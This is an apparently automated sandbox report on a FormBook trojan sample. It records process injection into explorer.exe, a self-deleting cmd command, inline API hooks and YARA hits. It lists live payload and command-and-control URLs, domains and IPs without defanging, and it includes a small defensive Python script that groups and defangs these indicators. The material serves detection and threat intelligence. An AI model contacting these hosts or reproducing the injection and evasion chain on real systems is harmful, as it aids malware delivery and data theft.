Lateral Movement: no hits: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content
Collection: Credential API Hooking (1), Archive Collected Data (11); no hits: Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Exfiltration: no hits: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (14); no hits: Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Network Effects, Remote Service Effects, Impact: no hits: Eavesdrop on Insecure Network Communication, Remotely Track Device Without Authorization, Modify System Partition, Exploit SS7 to Redirect Phone Calls/SMS, Remotely Wipe Data Without Authorization, Device Lockout, Exploit SS7 to Track Device Location, Obtain Device Cloud Backups, Delete Device Data, SIM Card Swap, Carrier Billing Fraud, Manipulate Device Communication, Manipulate App Store Rankings or Ratings, Jamming or Denial of Service, Abuse Accessibility Features, Rogue Wi-Fi Access Points, Data Encrypted for Impact, Downgrade to Insecure Protocols, Generate Fraudulent Advertising Revenue, Rogue Cellular Base Station, Data Destruction
Behavior Graph ID: 736964 | Sample: U8RYIwIvfK.exe | Start date: 03/11/2022 | Architecture: WINDOWS | Score: 100

Node 2 (start)
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 8 other signatures
  -> started node 10
Node 10: U8RYIwIvfK.exe 15 3
  DNS/IP: tgc8x.tk 50.115.174.192, 443, 49701, 49704 VIRPUS United States
  Dropped file: C:\Users\user\AppData\...\U8RYIwIvfK.exe.log, CSV
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
  -> started nodes 15, 18, 20 (aspnet_compiler.exe)
Node 15: aspnet_compiler.exe
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
  -> injected node 22
Node 18: aspnet_compiler.exe
  Signatures: Tries to detect virtualization through RDTSC time measurements
Node 20: aspnet_compiler.exe
Node 22: explorer.exe (injected)
  DNS/IP: www.mercydm.mobi; mercydm.mobi 34.102.136.180, 49705, 80 GOOGLEUS United States
  Signatures: System process connects to network (likely due to code injection or exploit)
  -> started node 26
Node 26: cmd.exe
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  -> started node 29
Node 29: cmd.exe 1
  -> started node 31
Node 31: conhost.exe

Submitted file
Source | Detection | Scanner | Label
U8RYIwIvfK.exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
U8RYIwIvfK.exe | 38% | Virustotal |
U8RYIwIvfK.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches

Unpacked PE files
Source | Detection | Scanner | Label
3.0.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains
Source | Detection | Scanner | Label
tgc8x.tk | 6% | Virustotal |

URLs
Source | Detection | Scanner | Label
https://tgc8x.tk/tt/ptrr.txt | 3% | Virustotal |
https://tgc8x.tk | 7% | Virustotal |
http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt | 0% | Avira URL Cloud | safe
https://tgc8x.tk | 0% | Avira URL Cloud | safe
www.ept-egy.com/zx85/ | 0% | Virustotal |
www.ept-egy.com/zx85/ | 0% | Avira URL Cloud | safe
http://tgc8x.tk | 0% | Avira URL Cloud | safe
https://tgc8x.tk/tt/ptrr.txt | 100% | Avira URL Cloud | phishing
https://tgc8x.tkD8 | 0% | Avira URL Cloud | safe
https://tgc8x.tk4 | 0% | Avira URL Cloud | safe
https://tgc8x.tk/tt/BLACKDEV.txt | 100% | Avira URL Cloud | phishing
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tgc8x.tk | 50.115.174.192 | true | true | | unknown
mercydm.mobi | 34.102.136.180 | true | false | | unknown
www.mercydm.mobi | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://tgc8x.tk/tt/BLACKDEV.txt | true | Avira URL Cloud: phishing | unknown
https://tgc8x.tk/tt/ptrr.txt | true | Virustotal 3%; Avira URL Cloud: phishing | unknown
www.ept-egy.com/zx85/ | true | Virustotal 0%; Avira URL Cloud: safe | low
http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt | false | Avira URL Cloud: safe | unknown
URLs found in memory or binary data
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://tgc8x.tk | U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | true | Virustotal 7%; Avira URL Cloud: safe | unknown
https://tgc8x.tk4 | U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tgc8x.tk | U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://tgc8x.tkD8 | U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
50.115.174.192 | tgc8x.tk | United States | 32875 | VIRPUS | true
34.102.136.180 | mercydm.mobi | United States | 15169 | GOOGLEUS | false
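Two things stand out in the IOC tables: the same URI path /zx85/ is served from two unrelated hosts (www.mercydm.mobi and www.ept-egy.com), while tgc8x.tk only ever appears with /tt/*.txt payload paths, and the scanner verdicts disagree with the sandbox (Avira URL Cloud rates the check-in URL "safe"). Grouping URLs by path makes the first point visible at a glance and is a better pivot than any single domain. The script below is an added example for this page, not Joe Sandbox code; the URL and host lists are copied from the tables above, and the grouping threshold and defang style are choices made here.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# IOCs copied from this report's URL, domain and IP tables (the trailing "4" and "D8" variants
# are memory-string artefacts the report lists verbatim and are left out here).
REPORT_URLS = [
    "https://tgc8x.tk/tt/BLACKDEV.txt",
    "https://tgc8x.tk/tt/ptrr.txt",
    "www.ept-egy.com/zx85/",
    "http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt",
    "https://tgc8x.tk",
    "http://tgc8x.tk",
]
REPORT_HOSTS = {"tgc8x.tk": "50.115.174.192", "mercydm.mobi": "34.102.136.180", "www.mercydm.mobi": None}


def normalize(url):
    """Return (host, path, query); the report lists some URLs without a scheme, so one is assumed."""
    if "://" not in url:
        url = "http://" + url
    p = urlsplit(url)
    return p.hostname.lower(), p.path or "/", p.query


def group_by_path(urls):
    """Map each non-root path to the set of hosts it was seen on."""
    groups = defaultdict(set)
    for u in urls:
        host, path, _ = normalize(u)
        if path != "/":
            groups[path].add(host)
    return dict(groups)


def shared_paths(urls, min_hosts=2):
    """Paths served by several distinct hosts: one check-in path behind a set of domains."""
    return {p: sorted(h) for p, h in group_by_path(urls).items() if len(h) >= min_hosts}


def defang(s):
    """Make an indicator safe to paste into a ticket or chat (hxxp://, [.])."""
    return s.replace("http", "hxxp").replace(".", "[.]")


def ioc_list(urls, hosts):
    """Defanged, de-duplicated indicators split by type."""
    return {
        "urls": sorted({defang(u) for u in urls}),
        "domains": sorted({defang(h) for h in hosts}),
        "ips": sorted({defang(ip) for ip in hosts.values() if ip}),
    }


if __name__ == "__main__":
    for path, hosts in shared_paths(REPORT_URLS).items():
        print(f"shared path {path}: {', '.join(hosts)}")
    for kind, items in ioc_list(REPORT_URLS, REPORT_HOSTS).items():
        print(kind, items)
```

The query string on the mercydm.mobi URL is kept intact in the URL list but ignored when grouping, since it is per-victim data and would defeat the point of the pivot.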
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:736964
                Start date and time:2022-11-03 12:38:55 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 48s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:U8RYIwIvfK.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@11/1@2/2
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 60.4% (good quality ratio 54.2%)
                • Quality average: 70.2%
                • Quality standard deviation: 31.4%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                12:40:00 | API Interceptor | 1x Sleep call for process: U8RYIwIvfK.exe modified
                Process:C:\Users\user\Desktop\U8RYIwIvfK.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):847
                Entropy (8bit):5.35816127824051
                Encrypted:false
                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                MD5:31E089E21A2AEB18A2A23D3E61EB2167
                SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):5.8598559767101115
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                • Win32 Executable (generic) a (10002005/4) 49.78%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:U8RYIwIvfK.exe
                File size:74240
                MD5:6f53598b9c19b30a0cf3ff0432301708
                SHA1:4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
                SHA256:6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
                SHA512:e655648f950b90261fd2b54be1ebfee9780ff466351d1cc4b1a675c41329fc5eae62f20ccb9423d3ee4e3457c7a8ed63b14bc2e30f205a4512122301ce2d1541
                SSDEEP:1536:7BKK5PX8Q01Hb20oJ0fekpamVGfhCW7j:lKSx0177ouekpamVGfhCW7j
                TLSH:E573EC8D766071DFC85BC872CEA82C68EA64747B531BD203A45326AD9E0D99BCF150F3
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;cc..............0..............%... ...@....@.. ..............................w%....`................................
                Icon Hash:30f0c4ccccc6b010
                Entrypoint:0x4125ee
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x63633BBE [Thu Nov 3 03:55:42 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x125a0 | 0x4b | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x1746 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x12558 | 0x1c | .text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x2000 | 0x105f4 | 0x10600 | False | 0.4767861402671756 | data | 5.884370189804151 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc | 0x14000 | 0x1746 | 0x1800 | False | 0.2711588541666667 | data | 4.422035362903512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x16000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x14164 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | |
                RT_GROUP_ICON | 0x1520c | 0x14 | data | |
                RT_VERSION | 0x15220 | 0x33c | data | |
                RT_MANIFEST | 0x1555c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
                DLL | Import
                mscoree.dll | _CorExeMain
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                11/03/22-12:39:59.450093 | TCP | 2018856 | ET TROJAN Windows executable base64 encoded | 443 | 49704 | 50.115.174.192 | 192.168.2.6
                11/03/22-12:39:56.025984 | UDP | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | 59575 | 53 | 192.168.2.6 | 8.8.8.8
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Nov 3, 2022 12:39:56.025984049 CET | 59575 | 53 | 192.168.2.6 | 8.8.8.8
                Nov 3, 2022 12:39:56.357557058 CET | 53 | 59575 | 8.8.8.8 | 192.168.2.6
                Nov 3, 2022 12:41:36.152439117 CET | 58595 | 53 | 192.168.2.6 | 8.8.8.8
                Nov 3, 2022 12:41:36.184751987 CET | 53 | 58595 | 8.8.8.8 | 192.168.2.6
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Nov 3, 2022 12:39:56.025984049 CET | 192.168.2.6 | 8.8.8.8 | 0x1cce | Standard query (0) | tgc8x.tk | A (IP address) | IN (0x0001) | false
                Nov 3, 2022 12:41:36.152439117 CET | 192.168.2.6 | 8.8.8.8 | 0x7240 | Standard query (0) | www.mercydm.mobi | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Nov 3, 2022 12:39:56.357557058 CET | 8.8.8.8 | 192.168.2.6 | 0x1cce | No error (0) | tgc8x.tk | | 50.115.174.192 | A (IP address) | IN (0x0001) | false
                Nov 3, 2022 12:41:36.184751987 CET | 8.8.8.8 | 192.168.2.6 | 0x7240 | No error (0) | www.mercydm.mobi | mercydm.mobi | | CNAME (Canonical name) | IN (0x0001) | false
                Nov 3, 2022 12:41:36.184751987 CET | 8.8.8.8 | 192.168.2.6 | 0x7240 | No error (0) | mercydm.mobi | | 34.102.136.180 | A (IP address) | IN (0x0001) | false
                • tgc8x.tk
                • www.mercydm.mobi

                Code Manipulations

                Function Name | Hook Type | Active in Processes
                PeekMessageA | INLINE | explorer.exe
                PeekMessageW | INLINE | explorer.exe
                GetMessageW | INLINE | explorer.exe
                GetMessageA | INLINE | explorer.exe
                Function Name | Hook Type | New Data
                PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE9
                GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE9
                GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE9


                Target ID:0
                Start time:12:39:53
                Start date:03/11/2022
                Path:C:\Users\user\Desktop\U8RYIwIvfK.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\U8RYIwIvfK.exe
                Imagebase:0x240000
                File size:74240 bytes
                MD5 hash:6F53598B9C19B30A0CF3FF0432301708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Target ID:1
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x120000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Target ID:2
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x3c0000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                Target ID:3
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x6a0000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:moderate

                Target ID:4
                Start time:12:40:02
                Start date:03/11/2022
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff647860000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                Target ID:14
                Start time:12:40:44
                Start date:03/11/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\cmd.exe
                Imagebase:0x1b0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                Target ID:15
                Start time:12:40:49
                Start date:03/11/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Imagebase:0x1b0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:16
                Start time:12:40:49
                Start date:03/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6da640000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                No disassembly